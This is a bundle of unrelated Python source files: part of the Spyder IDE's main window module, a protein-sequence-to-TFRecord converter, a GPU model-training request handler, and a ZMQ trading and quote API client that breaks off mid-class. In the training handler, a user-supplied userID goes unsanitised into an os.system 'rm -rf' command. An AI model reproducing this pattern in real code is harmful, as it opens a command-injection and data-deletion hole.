# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join(sys.path)
else:
env['PYTHONPATH'] = ':'.join(sys.path)
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error) # spyder: test-skip
print(command) # spyder: test-skip
# ---- Interactive Tours
def show_tour(self, index):
""" """
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global File Switcher
def open_fileswitcher(self, symbol=False):
"""Open file list management dialog box."""
if self.fileswitcher is not None and \
self.fileswitcher.is_visible:
self.fileswitcher.hide()
self.fileswitcher.is_visible = False
return
if symbol:
self.fileswitcher.plugin = self.editor
self.fileswitcher.set_search_text('@')
else:
self.fileswitcher.set_search_text('')
self.fileswitcher.show()
self.fileswitcher.is_visible = True
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_fileswitcher(symbol=True)
def add_to_fileswitcher(self, plugin, tabs, data, icon):
"""Add a plugin to the File Switcher."""
if self.fileswitcher is None:
self.fileswitcher = FileSwitcher(self, plugin, tabs, data, icon)
else:
self.fileswitcher.add_plugin(plugin, tabs, data, icon)
self.fileswitcher.sig_goto_file.connect(
plugin.get_current_tab_manager().set_stack_index)
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
# `feedback` = False is used on startup, so only positive feedback is
# given. `feedback` = True is used after startup (when using the
# menu action), and gives feedback whether updates are found or not.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
url_r = __project_url__ + '/releases'
url_i = 'https://docs.spyder-ide.org/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox(icon=QMessageBox.Information,
parent=self)
box.setWindowTitle(_("Spyder updates"))
box.set_checkbox_text(_("Check for updates on startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
anaconda_msg = ''
if 'Anaconda' in sys.version or 'conda-forge' in sys.version:
anaconda_msg = _("<hr><b>IMPORTANT NOTE:</b> It seems "
"that you are using Spyder with "
"<b>Anaconda/Miniconda</b>. Please "
"<b>don't</b> use <code>pip</code> to "
"update it as that will probably break "
"your installation.<br><br>"
"Instead, please wait until new conda "
"packages are available and use "
"<code>conda</code> to perform the "
"update.<hr>")
msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
"your package manager to update Spyder or go to our "
"<a href=\"%s\">Releases</a> page to download this "
"new version. <br><br>If you are not sure how to "
"proceed to update Spyder please refer to our "
" <a href=\"%s\">Installation</a> instructions."
"") % (latest_release, url_r, url_i)
msg += '<br>' + anaconda_msg
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
# Provide feedback when clicking the menu entry if check on startup is on
self.give_updates_feedback = True
@Slot()
def check_updates(self, startup=False):
"""
Check for Spyder updates on GitHub releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self, startup=startup)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
"""Initialize Qt, patching sys.exit and eventually setting up ETS"""
# This doesn't create our QApplication, just holds a reference to
# MAIN_APP, created above to show our splash screen as early as
# possible
app = qapplication()
# --- Set application icon
app.setWindowIcon(APP_ICON)
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
# Selecting Qt4 backend for Enthought Tool Suite (if installed)
try:
from enthought.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
except ImportError:
pass
return app
class Spy(object):
"""
Inspect Spyder internals
Attributes:
app Reference to main QApplication object
window Reference to spyder.MainWindow widget
"""
def __init__(self, app, window):
self.app = app
self.window = window
def __dir__(self):
return list(self.__dict__.keys()) +\
[x for x in dir(self.__class__) if x[0] != '_']
def versions(self):
return get_versions()
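# Editor's note (not part of the original module): run_spyder() below injects an
# instance of Spy into the internal console namespace as `spy`, so Spyder internals
# can be inspected interactively along these lines (a sketch):
#
#     spy.versions()        # component versions reported by get_versions()
#     spy.app               # the running QApplication instance
#     spy.window.editor     # e.g. the Editor plugin of the main window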
def run_spyder(app, options, args):
"""
Create and show Spyder's main window
Start QApplication event loop
"""
#TODO: insert here
# Main window
main = MainWindow(options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.shell.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
main.console.shell.interpreter.namespace['spy'] = \
Spy(app=app, window=main)
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main():
"""Main function"""
if running_under_pytest():
try:
from unittest.mock import Mock
except ImportError:
from mock import Mock # Python 2
options = Mock()
options.working_directory = None
options.profile = False
options.multithreaded = False
options.new_instance = False
options.open_project = None
options.window_title = None
app = initialize()
window = run_spyder(app, options, None)
return window
# **** Collect command line options ****
# Note regarding Options:
# It's important to collect options before monkey patching sys.exit,
# otherwise, optparse won't be able to exit if --help option is passed
options, args = get_options()
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize or bool(DEBUG))
app = initialize()
if options.reset_config_files:
# <!> Remove all configuration files!
reset_config_files()
return
elif options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults(save=True)
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# Show crash dialog
if CONF.get('main', 'crash', False) and not DEV:
CONF.set('main', 'crash', False)
if SPLASH is not None:
SPLASH.hide()
QMessageBox.information(
None, "Spyder",
"Spyder crashed during last session.<br><br>"
"If Spyder does not start at all and <u>before submitting a "
"bug report</u>, please try to reset settings to defaults by "
"running Spyder with the command line option '--reset':<br>"
"<span style=\'color: #555555\'><b>spyder --reset</b></span>"
"<br><br>"
"<span style=\'color: #ff5555\'><b>Warning:</b></span> "
"this command will remove all your Spyder configuration files "
"located in '%s').<br><br>"
"If Spyder still fails to launch, you should consult our "
"comprehensive <b><a href=\"%s\">Troubleshooting Guide</a></b>, "
"which when followed carefully solves the vast majority of "
"crashes; also, take "
"the time to search for <a href=\"%s\">known bugs</a> or "
"<a href=\"%s\">discussions</a> matching your situation before "
"submitting a report to our <a href=\"%s\">issue tracker</a>. "
"Your feedback will always be greatly appreciated."
"" % (get_conf_path(), __trouble_url__, __project_url__,
__forum_url__, __project_url__))
# Create main window
mainwindow = None
try:
mainwindow = run_spyder(app, options, args)
except FontError as fontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('main', 'icon_theme', 'spyder 2')
except BaseException:
CONF.set('main', 'crash', True)
import traceback
traceback.print_exc(file=STDERR)
traceback.print_exc(file=open('spyder_crash.log', 'w'))
if mainwindow is None:
# An exception occurred
if SPLASH is not None:
SPLASH.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
cUR50_tfrecords.py
|
# convert a pandas DataFrame of amino acid sequence, secondary structure
# sequence pairs into TF records
from multiprocessing import Process, Queue
from pathlib import Path
from glob import glob
import mmap
import pandas as pd
import numpy as np
import tensorflow as tf
from sklearn.model_selection import KFold
from proteinfeatures.features import prot_to_vector
HOME = str(Path.home())
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _floats_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def write_file(filename, data):
"""
Write a dataframe of records to a file.
"""
num_written = 0
num_skipped = 0
with tf.python_io.TFRecordWriter(filename) as writer:
for index in range(data.shape[0]):
sample = data.iloc[index]
# convert the string fields to bytes and assemble the Example features
try:
seq_id = bytes(sample.id, "utf-8")
seq_len = len(sample.seq)
seq = bytes(sample.seq, "utf-8")
seq_phyche = prot_to_vector(sample.seq).reshape(-1)
tf_example = tf.train.Example(features=tf.train.Features(feature={
"id": _bytes_feature(seq_id),
"seq_len": _int64_feature(seq_len),
"seq": _bytes_feature(seq),
"seq_phyche": _floats_feature(seq_phyche)}))
writer.write(tf_example.SerializeToString())
num_written += 1
except Exception as e:
print("Exception encountered while processing index %d" % index)
print(e)
print(sample.id)
num_skipped += 1
return num_written, num_skipped
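# Illustrative sketch (editor's addition, not part of the original script): how the
# records written by write_file() could be parsed back with the TF 1.x input pipeline.
# The feature keys mirror the ones serialized above; the file pattern is an assumption.
def parse_example(serialized):
    """Parse one serialized tf.train.Example produced by write_file (sketch)."""
    features = {
        "id": tf.FixedLenFeature([], tf.string),
        "seq_len": tf.FixedLenFeature([], tf.int64),
        "seq": tf.FixedLenFeature([], tf.string),
        # seq_phyche is a flattened float vector of variable length
        "seq_phyche": tf.VarLenFeature(tf.float32),
    }
    parsed = tf.parse_single_example(serialized, features)
    parsed["seq_phyche"] = tf.sparse.to_dense(parsed["seq_phyche"])
    return parsed
# Usage sketch:
#   dataset = tf.data.TFRecordDataset(sorted(glob(HOME + "/data/cUR50/tfrecords/cur50_*.tfrecords")))
#   dataset = dataset.map(parse_example)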
def worker(wid, worker_queue, done_queue):
"""
A worker processes views of the dataframe of records and writes them to
files.
It also tracks the total number of records written and skipped.
"""
files_written = 0
total_written = 0
total_skipped = 0
while True:
(filename, data) = worker_queue.get()
# check if done
if filename is None:
done_queue.put((total_written, total_skipped))
return
written, skipped = write_file(filename, data)
files_written += 1
total_written += written
total_skipped += skipped
if files_written % 5 == 0:
print("Worker %d:: %d total files, last file: %s \
\n\t- records written: %d, records skipped: %d\n" % (wid, files_written, filename, total_written, total_skipped))
def cUR50_to_tfrecords():
"""
Convert a pandas dataframe of protein sequences into a TFRecord
format.
"""
num_workers = 5
worker_queue = Queue(maxsize=10)
done_queue = Queue()
print("Spawning %d workers." % (num_workers))
workers = []
for i in range(num_workers):
p = Process(target=worker, args=(i, worker_queue, done_queue))
workers.append(p)
p.start()
files = ["cur50.csv"]
# the global count of output files
outfile_count = 0
outfile_prefix = HOME+"/data/cUR50/tfrecords/"
# find the last output file that was written
sorted_files = sorted(glob(outfile_prefix+"cur50_*.tfrecords"))
if len(sorted_files) > 0:
last_file = Path(sorted_files[-1]).stem
start_count = int(last_file.split("_")[-1]) - num_workers
start_count = start_count if start_count > 0 else 0
else:
start_count = 0
print("Starting at outfile #%d\n" % (start_count))
filesize = 1000
# for each subset of uniref50, containing a few million proteins
for f in files:
print("Processing %s\n" % f)
with open(HOME+"/data/cUR50/"+f, "r") as f_:
mm = mmap.mmap(f_.fileno(), 0, access=mmap.ACCESS_READ)
data = pd.read_csv(mm)
num_seqs = data.shape[0]
# split into tfrecord files, each with filesize (1000) proteins
num_outfiles = num_seqs // filesize if num_seqs % filesize == 0 else (num_seqs // filesize) + 1
print("\tNum Files: %d\n" % num_outfiles)
# pass views of the dataframe into the queue
for i in range(num_outfiles):
# NOTE: if the file already exists, skip it
if outfile_count < start_count:
outfile_count += 1
continue
outfile = outfile_prefix+"cur50_%05d.tfrecords" % (outfile_count)
start_index = i*filesize
end_index = (i+1)*filesize if (i+1)*filesize < num_seqs else num_seqs
worker_queue.put((outfile, data.iloc[start_index:end_index]))
outfile_count += 1
# pass stop signal to workers
for _ in range(num_workers):
worker_queue.put((None, None))
total_written = 0
total_skipped = 0
for _ in range(num_workers):
(records_written, records_skipped) = done_queue.get()
total_written += records_written
total_skipped += records_skipped
print("%d records written, %d records skipped" % (total_written, total_skipped))
print("Joining workers")
for p in workers:
p.join()
if __name__ == "__main__":
cUR50_to_tfrecords()
|
train.py
|
#!/home/zhuqingjie/env/py3_tf_low/bin/python
'''
@Time : 08.05 0005 01:45 PM
@Author : zhuqingjie
@User : zhu
@FileName: train.py
@Software: PyCharm
'''
import json, os, cv2, sys, time
import tensorflow as tf
from threading import Thread
# #################################### Check whether the GPU is usable #############################################
# def get_available_gpus():
# """
# code from http://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow
# """
# from tensorflow.python.client import device_lib as _device_lib
# local_device_protos = _device_lib.list_local_devices()
# print('get_available_gpus---------------------')
# for x in local_device_protos:
# if x.device_type == 'GPU':
# print(x.name)
# # return [x.name for x in local_device_protos if x.device_type == 'GPU']
#
#
# get_available_gpus()
# print(tf.__version__)
# exit()
# #################################### Check whether the GPU is usable #############################################
'''
Note: TF 1.14 requires CUDA 10.0 and cuDNN 7.4.2
'''
from flask import Flask, request
sys.path.append('/home/zhangli_lab/zhuqingjie/prj/tunet_onesample')
# from color import Colored as C
# from model import UNET as G
import config as cf
import SERVER.someconfig as somecf
import numpy as np
from SERVER.data_preprocess import process, get_batch
# import config as cf
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(list(map(str, cf.gpus)))
print_ = lambda x: print(f"--> [{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))}]: {x}")
printc = lambda s: print(f"\033[1;35m{s}\033[0m")
printc(tf.__version__)
# Asynchronous (fire-and-forget) decorator
def run_async(f):  # 'async' is a reserved keyword in Python 3.7+, so avoid it as a name
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
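# Editor's note: the decorator above is fire-and-forget -- the wrapped call returns
# immediately (with None) while the real work runs in a separate, non-daemon Thread,
# and exceptions raised inside the thread are not propagated back to the caller.
# Minimal usage sketch (nothing assumed beyond this module):
#
#     @run_async
#     def slow_job(seconds):
#         time.sleep(seconds)
#
#     slow_job(5)   # returns at once; the sleep happens in the background thread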
@run_async
def train(userid, sr_or_os, s, epochs=cf.epoch, batch_size=cf.batch_size):
'''
userid is the key parameter: it determines where the training data lives and
where the trained model is saved, so this function needs neither a data path argument nor a model path return value.
:param userid:
:param epochs:
:return:
'''
# Select the model topology
if sr_or_os == 'sr':
from model import UNET_sr as G
model_path = somecf.Release_model_path_sr
elif sr_or_os == 'os':
from model import UNET_os as G
model_path = somecf.Release_model_path_os
else:
print('train.py: line 42, [sr_or_os] must be "sr" or "os".')
exit()
# Load the training data
data_dir = f'/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample/{sr_or_os}/users/data_temp'
datas_x = np.load(os.path.join(data_dir, f'{userid}_x.npy'))
datas_y = np.load(os.path.join(data_dir, f'{userid}_y.npy'))
print_(f'train datas_x.shape:{datas_x.shape}')
print_(f'train datas_y.shape:{datas_y.shape}')
# get model path
flist = os.listdir(model_path)
for f in flist:
if ".meta" in f:
model_ind = f.split('.')[0]
break
checkpoint_path = os.path.join(model_path, model_ind)
# train
h, w = datas_y.shape[1:3]
g = G(H=h, W=w)
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.33333
# config.gpu_options.allow_growth = True
with tf.Session(graph=g.graph, config=config) as sess:
var_list_G = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'generator')
g_list = tf.global_variables()
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
bn_moving_vars = [g for g in bn_moving_vars if 'generator' in g.name]
saver = tf.train.Saver(max_to_keep=1, var_list=var_list_G + bn_moving_vars)
sess.run(tf.global_variables_initializer())
saver.restore(sess, checkpoint_path)
for ep in range(epochs):
bxs, bys = get_batch(datas_x, datas_y)
print_(f'get_batch bxs.shape:{bxs.shape}')
print_(f'get_batch bys.shape:{bys.shape}')
for batch_xs, batch_ys in zip(bxs, bys):
_, _, gs = sess.run(
[g.train_op_G, g.train_op_D, g.global_step],
feed_dict={g.x: batch_xs, g.y: batch_ys}
)
print_(f'epoch:{ep}/{cf.epoch}')
saver_path = f'/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample/{sr_or_os}/users/model_temp/{userid}'
os.mkdir(saver_path)
saver.save(sess, f'{saver_path}/model')
print_('train finished.')
sess.close()
s.in_training = False
pass
def handle(dic_url, sr_or_os, saved_dir, s):
print('\n')
print('-' * 50)
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
# Initialize the response fields
status = -1
info = 'initialization info'
check_path = 'null'
# This is a dummy loop, used only so we can break out early on errors
while True:
# Read the request parameters
error_param = 'error_param'
src_path = dic_url.get('src_path', error_param)
mode = dic_url.get('mode', error_param)
donotsave = dic_url.get('donotsave', error_param)
userID = dic_url.get('userID', error_param)
print_(f'\n\tsrc_path: {src_path}\n\tmode: {mode}\n\tdonotsave: {donotsave}\n\tuserID: {userID}')
if error_param in [src_path, mode, donotsave, userID]:
info = 'params error!'
break
# Validate the parameters
xypaths = [p.strip() for p in src_path.split() if p]
if len(xypaths) == 0:
info = 'param error: src_path'
break
flagerr_xyp = 0
for xyp in xypaths:
if ',' not in xyp:
flagerr_xyp = 1
if flagerr_xyp == 1:
info = 'param error: src_path'
break
# Check that the files exist
existed_flag = 0
for xyp in xypaths:
xp, yp = xyp.split(',')[0], xyp.split(',')[1]
if os.path.exists(xp) and os.path.exists(yp):
continue
else:
existed_flag = 1
break
if existed_flag == 1:
info = 'data error: the files in "src_path" do not exist!'
break
# Check that image shapes match, that the images can be read, and that they are neither too small nor too large
try:
shape_flag = 0
hw_flag = 0
for xyp in xypaths:
xp, yp = xyp.split(',')[0], xyp.split(',')[1]
xp_img = cv2.imread(xp)
yp_img = cv2.imread(yp)
h, w = xp_img.shape[:2]
if xp_img.shape != yp_img.shape:
shape_flag = 1
break
if h < 512 or w < 512 or h > 10000 or w > 10000:
hw_flag = 1
if shape_flag == 1:
info = 'data error: the image shapes are not identical!'
break
if hw_flag == 1:
info = "data error: the size of images is too small or too big! limit:512*512 -> 10000*10000"
break
except:
info = 'data error: read images failed!'
break
try:
# Preprocess and save the data
process(src_path, userID, sr_or_os, saved_dir, donotsave)
except:
info = 'process data error!'
break
# Train on the data and save the model
os.system(
f"rm -rf /home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample/{sr_or_os}/users/model_temp/{userID}")
train(userID, sr_or_os, s)
# saved model path
model_path = f'/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample/{sr_or_os}/users/model_temp/{userID}'
check_path = model_path
info = 'training...'
status = 0
break
# return
print_(f"\n\treturn:\n\tstatus: {status},\n\tinfo: {info},\n\tcheck_path: {check_path}")
print_('done.')
return json.dumps({
'status': status,
'info': info,
'check_path': check_path
})
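# Editor's note: because train() above is asynchronous, handle() returns almost
# immediately with status 0 and info 'training...' while training continues in a
# background thread; the s.in_training flag is cleared by train() once the model
# has been saved under check_path.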
if __name__ == '__main__':
dic_url = {
'src_path': '/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample_temp/pics/sr_x.bmp,/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample_temp/pics/sr_predict.bmp',
'mode': 3,
'donotsave': 0,
'userID': 'zhuqingjie_test'
}
class St():
def __init__(self):
self.in_training = False
s = St()
sr_or_os = 'sr'
saved_dir = f'/home/zhangli_lab/zhuqingjie/DATA/Small_cluster_data/dataset_saved/tunet_onesample/{sr_or_os}'
handle(dic_url, sr_or_os, saved_dir, s)
|
tcoreapi_mq.py
|
import zmq
import json
import re
import threading
class TCoreZMQ():
def __init__(self,APPID,SKey):
self.context = zmq.Context()
self.appid=APPID
self.ServiceKey=SKey
self.lock = threading.Lock()
self.m_objZMQKeepAlive = None
# Connect and log in
def Connect(self, port):
self.lock.acquire()
login_obj = {"Request":"LOGIN","Param":{"SystemName":self.appid, "ServiceKey":self.ServiceKey}}
self.socket = self.context.socket(zmq.REQ)
self.socket.connect("tcp://127.0.0.1:%s" % port)
self.socket.send_string(json.dumps(login_obj))
message = self.socket.recv()
message = message[:-1]
data = json.loads(message)
self.lock.release()
if data["Success"] == "OK":
self.CreatePingPong(data["SessionKey"], data["SubPort"])
return data
def CreatePingPong(self, sessionKey, subPort):
if self.m_objZMQKeepAlive != None:
self.m_objZMQKeepAlive.Close()
self.m_objZMQKeepAlive = KeepAliveHelper(subPort, sessionKey, self)
return
# Log out
def Logout(self, sessionKey):
self.lock.acquire()
obj = {"Request":"LOGOUT","SessionKey":sessionKey}
self.socket.send_string(json.dumps(obj))
self.lock.release()
return
# Query instrument (contract) information
def QueryInstrumentInfo(self, sessionKey, symbol):
self.lock.acquire()
obj = {"Request" : "QUERYINSTRUMENTINFO" , "SessionKey" : sessionKey , "Symbol" : symbol}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Query all instruments of a given type
# "Type":
# futures: Future
# options: Options
# stocks: Stock
def QueryAllInstrumentInfo(self, sessionKey, type):
self.lock.acquire()
obj = {"Request": "QUERYALLINSTRUMENT", "SessionKey": sessionKey, "Type": type}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Connection heartbeat (call this when a "PING" message is received)
def Pong(self, sessionKey, id = ""):
self.lock.acquire()
obj = {"Request":"PONG","SessionKey":sessionKey, "ID":id}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
class TradeAPI(TCoreZMQ):
def __init__(self,APPID, SKey):
super().__init__(APPID, SKey)
# Query the logged-in trading accounts
def QryAccount(self, sessionKey):
self.lock.acquire()
obj = {"Request":"ACCOUNTS","SessionKey":sessionKey}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Query today's order reports
def QryReport(self, sessionKey, qryIndex):
self.lock.acquire()
obj = {"Request":"RESTOREREPORT","SessionKey":sessionKey,"QryIndex":qryIndex}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Query today's fill (trade) reports
def QryFillReport(self, sessionKey, qryIndex):
self.lock.acquire()
obj = {"Request":"RESTOREFILLREPORT","SessionKey":sessionKey,"QryIndex":qryIndex}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Place an order
def NewOrder(self, sessionKey, param):
self.lock.acquire()
obj = {"Request":"NEWORDER","SessionKey":sessionKey}
obj["Param"] = param
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Modify an order
def ReplaceOrder(self, sessionKey, param):
self.lock.acquire()
obj = {"Request":"REPLACEORDER","SessionKey":sessionKey}
obj["Param"] = param
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Cancel an order
def CancelOrder(self, sessionKey, param):
self.lock.acquire()
obj = {"Request":"CANCELORDER","SessionKey":sessionKey}
obj["Param"] = param
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Query account funds/margin
def QryMargin(self, sessionKey, accountMask):
self.lock.acquire()
obj = {"Request":"MARGINS","SessionKey":sessionKey,"AccountMask":accountMask}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Query positions
def QryPosition(self, sessionKey, accountMask, qryIndex):
self.lock.acquire()
obj = {"Request":"POSITIONS","SessionKey":sessionKey,"AccountMask":accountMask,"QryIndex":qryIndex}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
class QuoteAPI(TCoreZMQ):
def __init__(self,APPID, SKey):
super().__init__(APPID, SKey)
# Subscribe to real-time quotes
def SubQuote(self, sessionKey, symbol):
self.lock.acquire()
obj = {"Request":"SUBQUOTE","SessionKey":sessionKey}
obj["Param"] ={"Symbol":symbol,"SubDataType":"REALTIME"}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Unsubscribe from real-time quotes (call this before each subscription to avoid duplicate subscriptions)
def UnsubQuote(self, sessionKey, symbol):
self.lock.acquire()
obj = {"Request":"UNSUBQUOTE","SessionKey":sessionKey}
obj["Param"] = {"Symbol":symbol,"SubDataType":"REALTIME"}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Subscribe to real-time greeks
def SubGreeks(self, sessionKey, symbol, greeksType = "REAL"):
self.lock.acquire()
obj = {"Request":"SUBQUOTE","SessionKey":sessionKey}
obj["Param"] = {"Symbol":symbol,"SubDataType":"GREEKS","GreeksType":greeksType}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Unsubscribe from real-time greeks (call this before each subscription to avoid duplicate subscriptions)
def UnsubGreeks(self, sessionKey, symbol, greeksType = "REAL"):
self.lock.acquire()
obj = {"Request":"UNSUBQUOTE","SessionKey":sessionKey}
obj["Param"] = {"Symbol":symbol,"SubDataType":"GREEKS","GreeksType":greeksType}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Subscribe to historical data
# 1: SessionKey,
# 2: instrument symbol,
# 3: data period: "TICKS", "1K", "DK",
# 4: history start time,
# 5: history end time
def SubHistory(self, sessionKey, symbol, type, startTime, endTime):
self.lock.acquire()
obj = {"Request":"SUBQUOTE","SessionKey":sessionKey}
obj["Param"] = {"Symbol": symbol,"SubDataType":type,"StartTime" :startTime,"EndTime" :endTime}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Unsubscribe from historical data (deprecated, no longer used)
# 1: SessionKey,
# 2: instrument symbol,
# 3: data period: "TICKS", "1K", "DK",
# 4: history start time,
# 5: history end time
def UnsubHistory(self, sessionKey, symbol, type, startTime, endTime):
self.lock.acquire()
obj = {"Request":"UNSUBQUOTE","SessionKey":sessionKey}
obj["Param"] = {"Symbol": symbol,"SubDataType":type,"StartTime" :startTime,"EndTime" :endTime}
self.socket.send_string(json.dumps(obj))
message = self.socket.recv()[:-1]
data = json.loads(message)
self.lock.release()
return data
# Fetch subscribed historical data page by page
def GetHistory(self, sessionKey, symbol, type, startTime, endTime, qryIndex):
self.lock.acquire()
obj = {"Request":"GETHISDATA","SessionKey":sessionKey}
obj["Param"] = {"Symbol": symbol,"SubDataType":type,"StartTime" :startTime,"EndTime" :endTime,"QryIndex" :qryIndex}
self.socket.send_string(json.dumps(obj))
message = (self.socket.recv()[:-1]).decode("utf-8")
index = re.search(":", message).span()[1]  # strip everything up to the first ':' so the remainder is valid JSON
message = message[index:]
message = json.loads(message)
self.lock.release()
return message
class KeepAliveHelper():
def __init__(self, subPort, session, objZMQ):
